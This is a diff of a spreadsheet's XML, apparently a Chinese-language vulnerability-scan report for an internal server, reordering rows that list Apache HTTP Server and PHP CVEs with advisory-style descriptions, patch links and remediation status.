       </c>
       <c r="J153" t="inlineStr">
         <is>
-          <t>CVE-2017-12933</t>
+          <t>CVE-2016-8670</t>
         </is>
       </c>
       <c r="K153" t="inlineStr">
@@ -20402,7 +20402,7 @@
     <row r="166">
       <c r="A166" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2022-23943)</t>
+          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
         </is>
       </c>
       <c r="B166" t="inlineStr">
@@ -20417,18 +20417,18 @@
       </c>
       <c r="D166" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Authentication Vulnerability</t>
         </is>
       </c>
       <c r="E166" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
+https://httpd.apache.org/download.cgi</t>
         </is>
       </c>
       <c r="F166" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
-Apache HTTP Server 2.4 版本 2.4.52 和之前版本的 mod_sed 中存在缓冲区错误漏洞，该漏洞允许攻击者使用攻击者提供的数据覆盖堆内存。</t>
+          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
         </is>
       </c>
       <c r="G166" t="inlineStr">
@@ -20448,7 +20448,7 @@
       </c>
       <c r="J166" t="inlineStr">
         <is>
-          <t>CVE-2022-23943</t>
+          <t>CVE-2022-31813</t>
         </is>
       </c>
       <c r="K166" t="inlineStr">
@@ -20644,7 +20644,7 @@
     <row r="168">
       <c r="A168" t="inlineStr">
         <is>
-          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
+          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2022-23943)</t>
         </is>
       </c>
       <c r="B168" t="inlineStr">
@@ -20659,18 +20659,18 @@
       </c>
       <c r="D168" t="inlineStr">
         <is>
-          <t>Authentication Vulnerability</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E168" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
-https://httpd.apache.org/download.cgi</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F168" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
+Apache HTTP Server 2.4 版本 2.4.52 和之前版本的 mod_sed 中存在缓冲区错误漏洞，该漏洞允许攻击者使用攻击者提供的数据覆盖堆内存。</t>
         </is>
       </c>
       <c r="G168" t="inlineStr">
@@ -20690,7 +20690,7 @@
       </c>
       <c r="J168" t="inlineStr">
         <is>
-          <t>CVE-2022-31813</t>
+          <t>CVE-2022-23943</t>
         </is>
       </c>
       <c r="K168" t="inlineStr">
@@ -21486,7 +21486,7 @@
     <row r="175">
       <c r="A175" t="inlineStr">
         <is>
-          <t>Oniguruma PHP 缓冲区错误漏洞(CVE-2017-9225)</t>
+          <t>PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)</t>
         </is>
       </c>
       <c r="B175" t="inlineStr">
@@ -21501,130 +21501,10 @@
       </c>
       <c r="D175" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E175" t="inlineStr">
-        <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接:https://github.com/kkos/oniguruma/commit/166a6c3999bf06b4de0ab4ce6b088a468cc4029f</t>
-        </is>
-      </c>
-      <c r="F175" t="inlineStr">
-        <is>
-          <t>Oniguruma是一款开源的正则表达式库。 Oniguruma 6.2.0存在缓冲区错误漏洞。该漏洞源于在 Ruby 中的 Oniguruma-mod 到 2.4.1 和 PHP 中的 mbstring 到 7.1.5 中使用。 在正则表达式编译期间，在 next_state_val() 中发生堆越界写入或读取。 大于 0xff 的八进制数在 fetch_token() 和 fetch_token_in_cc() 中无法正确处理。 包含 '700' 形式的八进制数的格式错误的正则表达式将在 next_state_val() 中生成大于 0xff 的无效代码点值，从而导致越界写入内存损坏。攻击者可利用该漏洞造成拒绝服务（栈越边界写入）。</t>
-        </is>
-      </c>
-      <c r="G175" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure</t>
-        </is>
-      </c>
-      <c r="H175" t="inlineStr">
-        <is>
-          <t>云镜</t>
-        </is>
-      </c>
-      <c r="I175" t="inlineStr">
-        <is>
-          <t>版本比对</t>
-        </is>
-      </c>
-      <c r="J175" t="inlineStr">
-        <is>
-          <t>CVE-2017-9225</t>
-        </is>
-      </c>
-      <c r="K175" t="inlineStr">
-        <is>
-          <t>2026-06-26 08:04:44</t>
-        </is>
-      </c>
-      <c r="L175" t="inlineStr">
-        <is>
-          <t>2026-06-26 02:39:39</t>
-        </is>
-      </c>
-      <c r="M175" t="inlineStr">
-        <is>
-          <t>10.128.165.151</t>
-        </is>
-      </c>
-      <c r="N175" t="inlineStr">
-        <is>
-          <t>服务器</t>
-        </is>
-      </c>
-      <c r="O175" t="inlineStr">
-        <is>
-          <t>MSS研发组</t>
-        </is>
-      </c>
-      <c r="P175" t="inlineStr"/>
-      <c r="Q175" t="inlineStr"/>
-      <c r="R175" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S175" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T175" t="inlineStr">
-        <is>
-          <t>未托管</t>
-        </is>
-      </c>
-      <c r="U175" t="inlineStr">
-        <is>
-          <t>84</t>
-        </is>
-      </c>
-      <c r="V175" t="inlineStr"/>
-      <c r="W175" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="X175" t="inlineStr">
-        <is>
-          <t>组件及版本: PHP:5.5.9-1</t>
-        </is>
-      </c>
-      <c r="Y175" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Z175" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="176">
-      <c r="A176" t="inlineStr">
-        <is>
-          <t>PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)</t>
-        </is>
-      </c>
-      <c r="B176" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C176" t="inlineStr">
-        <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D176" t="inlineStr">
-        <is>
-          <t>Code Execution</t>
-        </is>
-      </c>
-      <c r="E176" t="inlineStr">
         <is>
           <t>将PHP升级到官方最新版本 8.3.8、8.2.20和8.1.29。下载链接：https://www.php.net/downloads.php
 缓解方案：
@@ -21642,14 +21522,134 @@
 # ScriptAlias /php-cgi/ "C:/xampp/php/"</t>
         </is>
       </c>
+      <c r="F175" t="inlineStr">
+        <is>
+          <t>PHP语言在设计时忽略了Windows对字符编码转换的 Best-Fit 特性，导致未授权的攻击者可以通过特定字符串绕过 CVE-2012-1823 补丁，执行任意PHP代码，导致服务器失陷。</t>
+        </is>
+      </c>
+      <c r="G175" t="inlineStr">
+        <is>
+          <t>Hot Exploit、Vuln with Attack Code Disclosure、Ransomware Exploit、Virus Exploit、Active Vuln</t>
+        </is>
+      </c>
+      <c r="H175" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I175" t="inlineStr">
+        <is>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J175" t="inlineStr">
+        <is>
+          <t>CVE-2024-4577</t>
+        </is>
+      </c>
+      <c r="K175" t="inlineStr">
+        <is>
+          <t>2026-06-26 08:04:44</t>
+        </is>
+      </c>
+      <c r="L175" t="inlineStr">
+        <is>
+          <t>2026-06-26 02:39:39</t>
+        </is>
+      </c>
+      <c r="M175" t="inlineStr">
+        <is>
+          <t>10.128.165.151</t>
+        </is>
+      </c>
+      <c r="N175" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O175" t="inlineStr">
+        <is>
+          <t>MSS研发组</t>
+        </is>
+      </c>
+      <c r="P175" t="inlineStr"/>
+      <c r="Q175" t="inlineStr"/>
+      <c r="R175" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S175" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T175" t="inlineStr">
+        <is>
+          <t>未托管</t>
+        </is>
+      </c>
+      <c r="U175" t="inlineStr">
+        <is>
+          <t>84</t>
+        </is>
+      </c>
+      <c r="V175" t="inlineStr"/>
+      <c r="W175" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="X175" t="inlineStr">
+        <is>
+          <t>组件及版本: PHP:5.5.9-1</t>
+        </is>
+      </c>
+      <c r="Y175" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Z175" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="176">
+      <c r="A176" t="inlineStr">
+        <is>
+          <t>Oniguruma PHP 缓冲区错误漏洞(CVE-2017-9225)</t>
+        </is>
+      </c>
+      <c r="B176" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C176" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D176" t="inlineStr">
+        <is>
+          <t>Buffer Overflow</t>
+        </is>
+      </c>
+      <c r="E176" t="inlineStr">
+        <is>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接:https://github.com/kkos/oniguruma/commit/166a6c3999bf06b4de0ab4ce6b088a468cc4029f</t>
+        </is>
+      </c>
       <c r="F176" t="inlineStr">
         <is>
-          <t>PHP语言在设计时忽略了Windows对字符编码转换的 Best-Fit 特性，导致未授权的攻击者可以通过特定字符串绕过 CVE-2012-1823 补丁，执行任意PHP代码，导致服务器失陷。</t>
+          <t>Oniguruma是一款开源的正则表达式库。 Oniguruma 6.2.0存在缓冲区错误漏洞。该漏洞源于在 Ruby 中的 Oniguruma-mod 到 2.4.1 和 PHP 中的 mbstring 到 7.1.5 中使用。 在正则表达式编译期间，在 next_state_val() 中发生堆越界写入或读取。 大于 0xff 的八进制数在 fetch_token() 和 fetch_token_in_cc() 中无法正确处理。 包含 '700' 形式的八进制数的格式错误的正则表达式将在 next_state_val() 中生成大于 0xff 的无效代码点值，从而导致越界写入内存损坏。攻击者可利用该漏洞造成拒绝服务（栈越边界写入）。</t>
         </is>
       </c>
       <c r="G176" t="inlineStr">
         <is>
-          <t>Hot Exploit、Vuln with Attack Code Disclosure、Ransomware Exploit、Virus Exploit、Active Vuln</t>
+          <t>Vuln with Attack Code Disclosure</t>
         </is>
       </c>
       <c r="H176" t="inlineStr">
@@ -21664,7 +21664,7 @@
       </c>
       <c r="J176" t="inlineStr">
         <is>
-          <t>CVE-2024-4577</t>
+          <t>CVE-2017-9225</t>
         </is>
       </c>
       <c r="K176" t="inlineStr">
@@ -28803,7 +28803,7 @@
     <row r="233">
       <c r="A233" t="inlineStr">
         <is>
-          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
+          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
         </is>
       </c>
       <c r="B233" t="inlineStr">
@@ -28823,12 +28823,12 @@
       </c>
       <c r="E233" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F233" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G233" t="inlineStr">
@@ -28848,7 +28848,7 @@
       </c>
       <c r="J233" t="inlineStr">
         <is>
-          <t>CVE-2016-4543</t>
+          <t>CVE-2016-4540</t>
         </is>
       </c>
       <c r="K233" t="inlineStr">
@@ -28923,7 +28923,7 @@
     <row r="234">
       <c r="A234" t="inlineStr">
         <is>
-          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
+          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
         </is>
       </c>
       <c r="B234" t="inlineStr">
@@ -28943,12 +28943,12 @@
       </c>
       <c r="E234" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
         </is>
       </c>
       <c r="F234" t="inlineStr">
         <is>
-          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G234" t="inlineStr">
@@ -28968,7 +28968,7 @@
       </c>
       <c r="J234" t="inlineStr">
         <is>
-          <t>CVE-2016-4540</t>
+          <t>CVE-2016-4537</t>
         </is>
       </c>
       <c r="K234" t="inlineStr">
@@ -29043,7 +29043,7 @@
     <row r="235">
       <c r="A235" t="inlineStr">
         <is>
-          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
+          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
         </is>
       </c>
       <c r="B235" t="inlineStr">
@@ -29063,12 +29063,12 @@
       </c>
       <c r="E235" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
         </is>
       </c>
       <c r="F235" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G235" t="inlineStr">
@@ -29088,7 +29088,7 @@
       </c>
       <c r="J235" t="inlineStr">
         <is>
-          <t>CVE-2016-4537</t>
+          <t>CVE-2016-4543</t>
         </is>
       </c>
       <c r="K235" t="inlineStr">
@@ -29163,7 +29163,7 @@
     <row r="236">
       <c r="A236" t="inlineStr">
         <is>
-          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
+          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
         </is>
       </c>
       <c r="B236" t="inlineStr">
@@ -29178,17 +29178,17 @@
       </c>
       <c r="D236" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E236" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F236" t="inlineStr">
         <is>
-          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
         </is>
       </c>
       <c r="G236" t="inlineStr">
@@ -29208,7 +29208,7 @@
       </c>
       <c r="J236" t="inlineStr">
         <is>
-          <t>CVE-2016-4539</t>
+          <t>CVE-2016-4538</t>
         </is>
       </c>
       <c r="K236" t="inlineStr">
@@ -29283,7 +29283,7 @@
     <row r="237">
       <c r="A237" t="inlineStr">
         <is>
-          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
+          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
         </is>
       </c>
       <c r="B237" t="inlineStr">
@@ -29308,7 +29308,7 @@
       </c>
       <c r="F237" t="inlineStr">
         <is>
-          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G237" t="inlineStr">
@@ -29328,7 +29328,7 @@
       </c>
       <c r="J237" t="inlineStr">
         <is>
-          <t>CVE-2016-4541</t>
+          <t>CVE-2016-4542</t>
         </is>
       </c>
       <c r="K237" t="inlineStr">
@@ -29403,7 +29403,7 @@
     <row r="238">
       <c r="A238" t="inlineStr">
         <is>
-          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
+          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
         </is>
       </c>
       <c r="B238" t="inlineStr">
@@ -29418,17 +29418,17 @@
       </c>
       <c r="D238" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E238" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
         </is>
       </c>
       <c r="F238" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
+          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
         </is>
       </c>
       <c r="G238" t="inlineStr">
@@ -29448,7 +29448,7 @@
       </c>
       <c r="J238" t="inlineStr">
         <is>
-          <t>CVE-2016-4538</t>
+          <t>CVE-2016-4539</t>
         </is>
       </c>
       <c r="K238" t="inlineStr">
@@ -29523,7 +29523,7 @@
     <row r="239">
       <c r="A239" t="inlineStr">
         <is>
-          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
+          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
         </is>
       </c>
       <c r="B239" t="inlineStr">
@@ -29548,7 +29548,7 @@
       </c>
       <c r="F239" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
+          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G239" t="inlineStr">
@@ -29568,7 +29568,7 @@
       </c>
       <c r="J239" t="inlineStr">
         <is>
-          <t>CVE-2016-4542</t>
+          <t>CVE-2016-4541</t>
         </is>
       </c>
       <c r="K239" t="inlineStr">
@@ -30004,7 +30004,7 @@
     <row r="243">
       <c r="A243" t="inlineStr">
         <is>
-          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
+          <t>PHP 远程代码执行漏洞(CVE-2015-6834)</t>
         </is>
       </c>
       <c r="B243" t="inlineStr">
@@ -30019,7 +30019,7 @@
       </c>
       <c r="D243" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E243" t="inlineStr">
@@ -30029,7 +30029,7 @@
       </c>
       <c r="F243" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
+          <t>PHP中的5.4.45之前，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的多个Free-After-Use漏洞允许远程攻击者通过与（1）Serializable接口相关的向量执行任意代码，（2 ）SplObjectStorage类，以及（3）SplDoublyLinkedList类，它们在反序列化期间会被错误处理。</t>
         </is>
       </c>
       <c r="G243" t="inlineStr">
@@ -30049,7 +30049,7 @@
       </c>
       <c r="J243" t="inlineStr">
         <is>
-          <t>CVE-2016-1903</t>
+          <t>CVE-2015-6834</t>
         </is>
       </c>
       <c r="K243" t="inlineStr">
@@ -30124,7 +30124,7 @@
     <row r="244">
       <c r="A244" t="inlineStr">
         <is>
-          <t>PHP 远程代码执行漏洞(CVE-2015-6834)</t>
+          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
         </is>
       </c>
       <c r="B244" t="inlineStr">
@@ -30139,7 +30139,7 @@
       </c>
       <c r="D244" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E244" t="inlineStr">
@@ -30149,7 +30149,7 @@
       </c>
       <c r="F244" t="inlineStr">
         <is>
-          <t>PHP中的5.4.45之前，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的多个Free-After-Use漏洞允许远程攻击者通过与（1）Serializable接口相关的向量执行任意代码，（2 ）SplObjectStorage类，以及（3）SplDoublyLinkedList类，它们在反序列化期间会被错误处理。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
         </is>
       </c>
       <c r="G244" t="inlineStr">
@@ -30169,7 +30169,7 @@
       </c>
       <c r="J244" t="inlineStr">
         <is>
-          <t>CVE-2015-6834</t>
+          <t>CVE-2016-1903</t>
         </is>
       </c>
       <c r="K244" t="inlineStr">
@@ -34453,7 +34453,7 @@
     <row r="280">
       <c r="A280" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 输入验证错误漏洞（CVE-2022-22721）</t>
+          <t>Apache HTTP Server 请求走私漏洞(CVE-2022-36760)</t>
         </is>
       </c>
       <c r="B280" t="inlineStr">
@@ -34468,18 +34468,17 @@
       </c>
       <c r="D280" t="inlineStr">
         <is>
-          <t>Improper Input Validation</t>
+          <t>Protocol Bypass</t>
         </is>
       </c>
       <c r="E280" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F280" t="inlineStr">
         <is>
-          <t xml:space="preserve">Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4.52 及更早版本存在输入验证错误漏洞，该漏洞源于如果在 32 位系统上将 LimitXMLRequestBody 设置为允许大于 350MB（默认为 1M）的请求正文，则会发生整数溢出，随后会导致越界写入。
-</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4版本至2.4.54之前版本存在环境问题漏洞，该漏洞源于从mod_proxy_ajp函数中发现包含HTTP请求走私漏洞。</t>
         </is>
       </c>
       <c r="G280" t="inlineStr">
@@ -34499,7 +34498,7 @@
       </c>
       <c r="J280" t="inlineStr">
         <is>
-          <t>CVE-2022-22721</t>
+          <t>CVE-2022-36760</t>
         </is>
       </c>
       <c r="K280" t="inlineStr">
@@ -34574,7 +34573,7 @@
     <row r="281">
       <c r="A281" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 请求走私漏洞(CVE-2022-36760)</t>
+          <t>Apache HTTP Server 输入验证错误漏洞（CVE-2022-22721）</t>
         </is>
       </c>
       <c r="B281" t="inlineStr">
@@ -34589,17 +34588,18 @@
       </c>
       <c r="D281" t="inlineStr">
         <is>
-          <t>Protocol Bypass</t>
+          <t>Improper Input Validation</t>
         </is>
       </c>
       <c r="E281" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F281" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4版本至2.4.54之前版本存在环境问题漏洞，该漏洞源于从mod_proxy_ajp函数中发现包含HTTP请求走私漏洞。</t>
+          <t xml:space="preserve">Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4.52 及更早版本存在输入验证错误漏洞，该漏洞源于如果在 32 位系统上将 LimitXMLRequestBody 设置为允许大于 350MB（默认为 1M）的请求正文，则会发生整数溢出，随后会导致越界写入。
+</t>
         </is>
       </c>
       <c r="G281" t="inlineStr">
@@ -34619,7 +34619,7 @@
       </c>
       <c r="J281" t="inlineStr">
         <is>
-          <t>CVE-2022-36760</t>
+          <t>CVE-2022-22721</t>
         </is>
       </c>
       <c r="K281" t="inlineStr">
@@ -36866,7 +36866,7 @@
     <row r="300">
       <c r="A300" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 输入验证错误漏洞(CVE-2022-28615)</t>
+          <t>Apache HTTP Server 缓冲区溢出漏洞(CVE-2021-44790)</t>
         </is>
       </c>
       <c r="B300" t="inlineStr">
@@ -36881,18 +36881,19 @@
       </c>
       <c r="D300" t="inlineStr">
         <is>
-          <t>Out Of Bounds Array Access Vulnerability</t>
